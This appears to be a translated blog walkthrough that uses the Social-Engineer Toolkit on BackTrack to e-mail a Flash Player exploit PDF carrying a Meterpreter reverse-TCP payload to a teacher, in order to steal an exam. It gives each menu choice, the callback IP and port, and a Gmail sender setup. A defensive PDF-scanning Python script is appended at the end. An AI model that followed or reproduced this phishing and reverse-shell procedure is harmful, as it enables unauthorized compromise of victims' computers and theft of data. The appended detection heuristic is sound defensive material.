BackTrack: pwning a target's machine by e-mail and getting a reverse cmd shell

Article from the Nuclear 博客 (Nuclear's blog)

The foreign site http://backtrack.it/ has already published a video demo of this.

Finals are about to start. Even though I control the whole school network and so on, I still haven't got hold of the final exam paper! So the idea is to take over the teacher's computer by e-mail and steal the exam paper (just kidding, don't take it seriously). Let's get started.

My machine's IP:

192.168.56.137 // BackTrack 4

We need:

#1 a Gmail account

#2 the target's mail address

login as: root

root@192.168.56.137's password:

BackTrack 4 R2 (CodeName Nemesis) Security Auditing

For more information visit: http://www.backtrack-linux.org/
Last login: Wed Dec 29 00:09:34 2010 from 192.168.56.139
root@bt:~# clear
root@bt:~# cd /pentest/exploits/SET/ // go to the SET tool directory
root@bt:/pentest/exploits/SET# ./set // run the tool

[SET ASCII-art logo]

[---] The Social-Engineer Toolkit (SET) [---]
[---] Written by David Kennedy (ReL1K) [---]
[---] Version: 1.0 [---]
[---] Codename: Devolution [---]
[---] Report bugs to: davek@social-engineer.org [---]
[---] Follow Me On Twitter: dave_rel1k [---]
[---] Java Applet Written by: Thomas Werth [---]
[---] Homepage: http://www.secmaniac.com [---]
[---] Framework: http://www.social-engineer.org [---]
[---] Over 1.4 million downloads and counting. [---]

Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs..

DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com

Select from the menu: // the main menu; we want option 1

1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. SMS Spoofing Attack Vector
8. Update the Metasploit Framework
9. Update the Social-Engineer Toolkit
10. Help, Credits, and About
11. Exit the Social-Engineer Toolkit

Enter your choice: 1 // enter 1

Welcome to the SET E-Mail attack method. This module allows you
to specially craft email messages and send them to a large (or small)
number of people with attached fileformat malicious payloads. If you
want to spoof your email address, be sure "Sendmail" is installed (it
is installed in BT4) and change the config/set_config SENDMAIL=OFF flag
to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!

1. Perform a Mass Email Attack
2. Create a FileFormat Payload
3. Create a Social-Engineering Template
4. Return to Main Menu

Enter your choice: 1 // choose 1 again

Select the file format exploit you want.
The default is the PDF embedded EXE.

********** PAYLOADS ********** // these are the exploit modules, the important part. I know our teacher uses Flash Player, so I pick 2 and send a Flash Player exploit file

1. SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2. Adobe Flash Player Button Remote Code Execution
3. Adobe CoolType SING Table uniqueName Overflow
4. Adobe Flash Player newfunction Invalid Pointer Use
5. Adobe Collab.collectEmailInfo Buffer Overflow
6. Adobe Collab.getIcon Buffer Overflow
7. Adobe JBIG2Decode Memory Corruption Exploit
8. Adobe PDF Embedded EXE Social Engineering
9. Adobe util.printf() Buffer Overflow
10. Custom EXE to VBA (sent via RAR) (RAR required)
11. Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
12. Adobe PDF Embedded EXE Social Engineering (NOJS)

Enter the number you want (press enter for default): 2 // i.e. select item 2 from the list above

1. Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker.
2. Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker.
4. Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline
5. Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter
6. Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system.
7. Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter

Enter the payload you want (press enter for default): 2 // this chooses how the shell connects back. Take the second one, since we will handle it with Metasploit (Meterpreter)
Enter the port to connect back on (press enter for default): 4444 // the port the shell connects back to; any other port works too

Generating fileformat exploit...

Payload creation complete.

All payloads get sent to the src/program_junk/template.pdf directory


As an added bonus, use the file-format creator in SET to create your attachment.

Right now the attachment will be imported with filename of template.whatever

Do you want to rename the file?

example Enter the new filename: moo.pdf

1. Keep the filename, I dont care.
2. Rename the file, I want to be cool.

Enter your choice (enter for default): 2 // the generated exploit file is called template.pdf by default (moo.pdf is only the prompt's example); I want a cooler name, so I choose 2
Enter the new filename: helloworld.pdf // the cool name I came up with
Filename changed, moving on...

Social Engineer Toolkit Mass E-Mailer

There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.

What do you want to do: // choose the sending mode

1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
3. Return to main menu.

Enter your choice: 1 // a single recipient, so choose 1

Do you want to use a predefined template or craft
a one time email template.

1. Pre-Defined Template
2. One-Time Use Email Template

Enter your choice: 1 // 1 once more
Below is a list of available templates:

1: New Update
2: Computer Issue
3: Strange internet usage from your computer
4: LOL...have to check this out...
5: Status Report
6: Baby Pics
7: Dan Browns Angels & Demons

Enter the number you want to use: 1 // this picks the mail template; 1 is "New Update", the subject the teacher will see

Enter who you want to send email to: 15699*****@qq.com // the target account to pwn

What option do you want to use?

1. Use a GMAIL Account for your email attack.
2. Use your own server or open relay

Enter your choice: 1 // choose the mailbox you send from
Enter your GMAIL email address: xi7o***@gmail.com // enter my e-mail address
Enter your password for gmail (it will not be displayed back to you): // enter my mailbox password (it is not echoed)

Do you want to setup a listener yes or no: no // whether SET should start a listener. Not now, because I will listen with Metasploit myself. The handler started there has to match what was chosen above: windows/meterpreter/reverse_tcp, LPORT 4444, LHOST 192.168.56.137

// Once the above is done the mail has already been sent. You can test it on yourself first. Then exit SET; Ctrl+C works.

root@bt:/pentest/exploits/SET# cd .. // back up one directory
root@bt:/pentest/exploits# cd framework3/ // go to the Metasploit directory
root@bt:/pentest/exploits/framework3# ls
HACKING external msfconsole msfgui msfpescan plugins tools
README lib msfd msfmachscan msfrpc prof
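The attachment SET produced above (helloworld.pdf, a file-format exploit carrying the Meterpreter payload) is what lands in the teacher's mailbox. As an added example, not part of the original post and not code from SET or Metasploit, here is the kind of triage a defender, or a tester checking their own attachment before sending, runs over such a PDF. It looks for the PDF features the payload menu above relies on: an /OpenAction or /AA trigger, JavaScript, a /Launch action, an /EmbeddedFile (the "PDF Embedded EXE" items) or a /RichMedia annotation (Flash content inside a PDF). It inflates FlateDecode streams and resolves #xx name escapes, because both hide keywords from a plain grep. The two PDFs are constructed inline for the demonstration; only the file name helloworld.pdf/helloworld.exe comes from the post, and the object layout is assumed.

```python
"""Triage a PDF attachment for the features file-format exploits and droppers rely on.

Added example (not from the original post, SET or Metasploit); sample PDFs are constructed below.
"""
import re
import zlib

# PDF name objects that matter for exploit-bearing / dropper PDFs.
SUSPICIOUS_NAMES = (
    b"/OpenAction", b"/AA",                    # run something when the file is opened
    b"/JS", b"/JavaScript", b"/Launch",        # script or external program execution
    b"/EmbeddedFile", b"/RichMedia", b"/XFA",  # carried files, Flash/SWF, XFA forms
)
TRIGGERS = {"/OpenAction", "/AA"}
ACTIONS = {"/JS", "/JavaScript", "/Launch", "/EmbeddedFile", "/RichMedia", "/XFA"}

_HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")
_STREAM = re.compile(rb"stream\r?\n(.*?)endstream", re.DOTALL)


def decode_name_escapes(data: bytes) -> bytes:
    """PDF names may spell any byte as #xx (/Java#53cript == /JavaScript); undo that."""
    return _HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def inflate_streams(data: bytes) -> bytes:
    """Append the inflated body of every stream that decompresses as zlib/FlateDecode,
    so keywords tucked into compressed objects are visible to the keyword scan."""
    parts = [data]
    for m in _STREAM.finditer(data):
        try:
            # decompressobj ignores the trailing newline before 'endstream'
            parts.append(zlib.decompressobj().decompress(m.group(1)))
        except zlib.error:
            continue  # not Flate (or corrupt): the raw scan still covers it
    return b"\n".join(parts)


def count_names(data: bytes) -> dict:
    """Count each suspicious name after inflating streams and resolving #xx escapes."""
    text = decode_name_escapes(inflate_streams(data))
    counts = {}
    for name in SUSPICIOUS_NAMES:
        # require a delimiter after the name so /JS does not also match /JSX
        pattern = re.escape(name) + rb"(?![A-Za-z0-9])"
        counts[name.decode()] = len(re.findall(pattern, text))
    return counts


def triage(data: bytes):
    """Return (verdict, reasons); verdict is 'not-a-pdf', 'clean' or 'suspicious'."""
    if not data.lstrip().startswith(b"%PDF-"):
        return "not-a-pdf", ["missing %PDF- header"]
    present = {name for name, n in count_names(data).items() if n}
    reasons = []
    if present & TRIGGERS and present & ACTIONS:
        reasons.append("auto-trigger %s drives %s"
                       % (sorted(present & TRIGGERS), sorted(present & ACTIONS)))
    if present & {"/EmbeddedFile", "/Launch"}:
        reasons.append("embedded or launched file: dropper pattern (PDF Embedded EXE)")
    if "/RichMedia" in present:
        reasons.append("RichMedia annotation: embedded Flash/SWF content")
    return ("suspicious" if reasons else "clean"), reasons


def _flate_stream(body: bytes) -> bytes:
    comp = zlib.compress(body)
    return b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(comp) + comp + b"\nendstream"


# Constructed sample, NOT a real SET output: the JavaScript action sits inside a compressed
# stream and the /EmbeddedFile name is #xx-escaped, as evasive samples do. The names
# helloworld.pdf / helloworld.exe follow the post; the object layout is assumed for the demo.
SAMPLE_MALICIOUS = (
    b"%PDF-1.6\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj\n"
    b"4 0 obj "
    + _flate_stream(b"<< /S /JavaScript /JS (this.exportDataObject({cName:'helloworld.exe', nLaunch:2})) >>")
    + b" endobj\n"
    b"5 0 obj << /Type /Embedded#46ile /Length 4 >> stream\nMZ\x90\x00\nendstream endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

# Constructed benign sample: one page of text, no actions, uncompressed content stream.
SAMPLE_BENIGN = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /Contents 4 0 R >> endobj\n"
    b"4 0 obj << /Length 33 >> stream\nBT /F1 12 Tf (hello world) Tj ET\nendstream endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

if __name__ == "__main__":
    for label, pdf in (("helloworld.pdf (constructed)", SAMPLE_MALICIOUS),
                       ("benign.pdf (constructed)", SAMPLE_BENIGN)):
        verdict, reasons = triage(pdf)
        print(label, "->", verdict, *reasons, sep="\n  ")
```

This is a keyword heuristic, the same idea as Didier Stevens' pdfid: it tells you a PDF deserves a closer look, not that it is safe. Object streams using filters other than Flate, encrypted documents, and actions split across incremental updates all get past it, so treat a "clean" verdict on an unexpected attachment as "nothing obvious", and follow up with a full parser before opening the file on a real workstation.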